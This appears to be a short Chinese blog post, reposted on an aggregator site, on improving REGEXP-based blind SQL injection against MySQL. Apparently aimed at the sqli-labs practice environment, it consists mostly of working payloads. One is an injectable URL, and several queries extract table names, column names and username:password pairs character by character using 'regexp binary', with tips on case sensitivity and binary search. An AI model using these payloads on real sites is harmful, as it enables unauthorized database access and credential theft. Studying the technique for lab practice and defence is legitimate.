regexp盲注的一些改进

Posted 君莫笑hhhhhh

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了regexp盲注的一些改进相关的知识,希望对你有一定的参考价值。

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^[a-z]‘ LIMIT 0,1) /*

  这是之前看别人的文章写的exp,觉得有点啰嗦,其实可以很直白的写

select group_concat(table_name) from information_schema.tables where table_schema=security;
select((select group_concat(table_name) from information_schema.tables where table_schema=security) regexp binary ^e);
select group_concat(column_name) from information_schema.columns where table_name=users;
select((select group_concat(column_name) from information_schema.columns where table_name=users) regexp binary ^i);
select group_concat(username,:,password) from security.users;
select((select group_concat(username,:,password) from security.users) regexp binary ^D);

几个注意点

1 可以直接用group_concat全部匹配出来

2 mysql中用regexp是区分大小写的,只有对取md5的时候没关系,其他时候要加上binary,不过取数据时就不用group_concat了,用limit一条一条取

3 regexp也可以用二分法 ‘^[a-z]‘ 到 ‘^[a-h]‘

以上是关于regexp盲注的一些改进的主要内容,如果未能解决你的问题,请参考以下文章

SQL盲注的简单语句怎么写

什么是sql盲注

盲注学习总结

sqli-labs less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)

sqli-labs less40 GET -Blind based -String -Stacked(GET型基于盲注的堆叠查询字符型注入)

sqli-labs less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)